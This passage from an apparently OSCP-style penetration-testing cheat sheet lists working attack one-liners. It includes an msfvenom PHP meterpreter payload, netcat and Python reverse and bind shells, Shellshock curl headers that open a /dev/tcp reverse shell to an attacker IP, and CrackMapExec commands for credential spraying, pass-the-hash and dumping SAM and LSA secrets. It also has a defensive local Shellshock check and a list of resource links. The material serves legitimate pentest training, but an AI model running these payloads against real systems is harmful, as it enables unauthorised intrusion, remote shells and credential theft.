- `msfvenom -p php/meterpreter/reverse_tcp LHOST=????????? LPORT=6000 R > phpmeterpreter.php`
  - `R` is the old spelling of `-f raw`

### **Netcat**

- Listener: `nc -lvp <PORT>`
  - Listen verbosely on a port.
- Target: `nc -e /bin/bash listeneripaddress listenerport`
- or `ncat -v -l -p 7777 -e /bin/bash`
  - Bind shell instead: connect to port 7777 on the target.
- Host: `cat happy.txt | ncat -v -l -p 5555`, target: `ncat HOSTIP 5555 > happy_copy.txt`
  - Download a file via ncat (the original used `localhost` for the target side, which only works when both ends are the same machine)

### **Reverse shell using interpreters ([http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet))**

- `python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`
- `python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('127.0.0.1',9000))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"`
  - Runs each received chunk with `shell=True` and sends stdout and stderr back over the socket

### **Shellshock**

- `curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status`
- `curl -x 192.168.28.167:PORT -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.28.169/1234 0>&1" 192.168.28.167/cgi-bin/status`
  - `-x` sets a proxy; only keep it if you really are going through one, otherwise request `http://TARGET/cgi-bin/status` directly.
- `ssh username@IPADDRESS '() { :;}; /bin/bash'`
  - Shellshock over SSH: works against accounts restricted with `ForceCommand` or an `authorized_keys` `command=`, because the requested command is exported as `SSH_ORIGINAL_COMMAND`

# CrackMapExec

- `crackmapexec smb 192.168.10.0/24 -u username -p password --local-auth --sam`
  - Spray the network with local login credentials, then dump SAM contents
- `crackmapexec smb 192.168.10.0/24 -u username -H NTHASH --local-auth --lsa`
  - Pass the hash network-wide, local login, dump LSA contents
- `crackmapexec smb 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test`
  - Requires the Empire RESTful API to be running. It will spray the supplied credentials and pop an Empire agent on any successful login. Read more [here](https://github.com/byt3bl33d3r/CrackMapExec/wiki/Getting-Shells-101)
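Before firing the curl or ssh Shellshock payloads above it helps to know what a positive looks like, and whether a shell you have already landed on is itself vulnerable. The function below is an added example, not from the original cheat sheet: it runs the public CVE-2014-6271 test string (a function definition with a trailing command, exported as an environment variable) against a given shell binary and reports whether the trailing command was executed during environment import. It assumes `env` is available; any patched bash, and dash, should come back clean.

```shell
#!/bin/sh
# Added example: local Shellshock (CVE-2014-6271) check for a bash binary.
# Exit status: 0 = vulnerable, 1 = not vulnerable, 2 = binary not found.
shellshock_vulnerable() {  # usage: shellshock_vulnerable [/path/to/bash]
  sh_bin="${1:-bash}"
  command -v "$sh_bin" >/dev/null 2>&1 || return 2
  # A vulnerable bash parses the exported variable as a function definition and keeps
  # going, executing the trailing "echo VULNERABLE" while importing the environment.
  # A fixed bash only imports variables named BASH_FUNC_x%% and ignores the rest.
  out="$(env x='() { :;}; echo VULNERABLE' "$sh_bin" -c 'echo probe' 2>/dev/null)"
  case "$out" in
    *VULNERABLE*) return 0 ;;
    *)            return 1 ;;
  esac
}

# Human-readable wrapper, for a report or for looping over several binaries.
shellshock_report() {  # usage: shellshock_report [/path/to/bash]
  if shellshock_vulnerable "$1"; then
    echo "${1:-bash}: VULNERABLE to CVE-2014-6271"
  elif [ $? -eq 2 ]; then
    echo "${1:-bash}: not found"
  else
    echo "${1:-bash}: not vulnerable"
  fi
}

# Demonstration against the local shells:
shellshock_report bash
shellshock_report sh
```

The remote CGI probes on this page are the same trick delivered through an HTTP header that the web server copies into the CGI script's environment; when testing a target, swap the reverse-shell payload for something harmless such as `() { :;}; echo; echo shellshock-marker` and look for the marker in the response body before escalating.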
# **Resources & Links**

## **Windows Privilege Escalation**

[http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)

[https://toshellandback.com/2015/11/24/ms-priv-esc/](https://toshellandback.com/2015/11/24/ms-priv-esc/)

## **SQL & Apache Log paths**

[http://www.itninja.com/blog/view/mysql-and-apache-profile-log-path-locations](http://www.itninja.com/blog/view/mysql-and-apache-profile-log-path-locations)

## **Recon**

[https://bitvijays.github.io/blog/2015/04/09/learning-from-the-field-intelligence-gathering/](https://bitvijays.github.io/blog/2015/04/09/learning-from-the-field-intelligence-gathering/)

## **Cheat Sheets (Includes scripts):**

[http://pentestmonkey.net/](http://pentestmonkey.net/)

[https://highon.coffee/blog/cheat-sheet/](https://highon.coffee/blog/cheat-sheet/)

[https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)

## **Meterpreter Stuff**

[http://netsec.ws/?p=331](http://netsec.ws/?p=331)

## **Proxy Chaining**

- `apt-get install sshuttle`

[https://github.com/sshuttle/sshuttle](https://github.com/sshuttle/sshuttle)

[https://github.com/rofl0r/proxychains-ng](https://github.com/rofl0r/proxychains-ng)

[https://www.offensive-security.com/metasploit-unleashed/proxytunnels/](https://www.offensive-security.com/metasploit-unleashed/proxytunnels/)

## **Huge collection of common commands and scripts as well as general pentest info**

[https://bobloblaw.gitbooks.io/security/content/](https://bobloblaw.gitbooks.io/security/content/)
## **Scripts**

[https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)

[https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)

[https://github.com/azmatt/windowsEnum](https://github.com/azmatt/windowsEnum)

[https://github.com/leebaird/discover](https://github.com/leebaird/discover)

[https://nmap.org/nsedoc/](https://nmap.org/nsedoc/)

## **Pentester Bookmarks, huge collection of blogs, forums, and resources.**

[https://code.google.com/archive/p/pentest-bookmarks/wikis/BookmarksList.wiki](https://code.google.com/archive/p/pentest-bookmarks/wikis/BookmarksList.wiki)

[https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)

## **Pentest Checklist**

[http://mateustymbu.xpg.uol.com.br/Bibliography/Pentest_Checklist.pdf](http://mateustymbu.xpg.uol.com.br/Bibliography/Pentest_Checklist.pdf)

## **Pentesting Workflow**

[https://workflowy.com/s/FgBl.6qcAQUUqWM](https://workflowy.com/s/FgBl.6qcAQUUqWM)

## **OSCP Writeups, blogs, and notes:**
[https://xapax.github.io/blog/2017/01/14/OSCP.html](https://xapax.github.io/blog/2017/01/14/OSCP.html)

[http://www.securitysift.com/offsec-pwb-oscp/](http://www.securitysift.com/offsec-pwb-oscp/)

[https://netsecfocus.com/topic/32/oscp-like-vulnhub-vms](https://netsecfocus.com/topic/32/oscp-like-vulnhub-vms)

[https://blog.propriacausa.de/wp-content/uploads/2016/07/oscp_notes.html](https://blog.propriacausa.de/wp-content/uploads/2016/07/oscp_notes.html)

[https://localhost.exposed/path-to-oscp/](https://localhost.exposed/path-to-oscp/)

[https://www.reddit.com/r/netsecstudents/comments/5i00w6/my_experience_with_the_oscp/](https://www.reddit.com/r/netsecstudents/comments/5i00w6/my_experience_with_the_oscp/)

[https://naterobb.blogspot.com/2017/02/my-experience-with-oscp-to-kick-off-my.html](https://naterobb.blogspot.com/2017/02/my-experience-with-oscp-to-kick-off-my.html)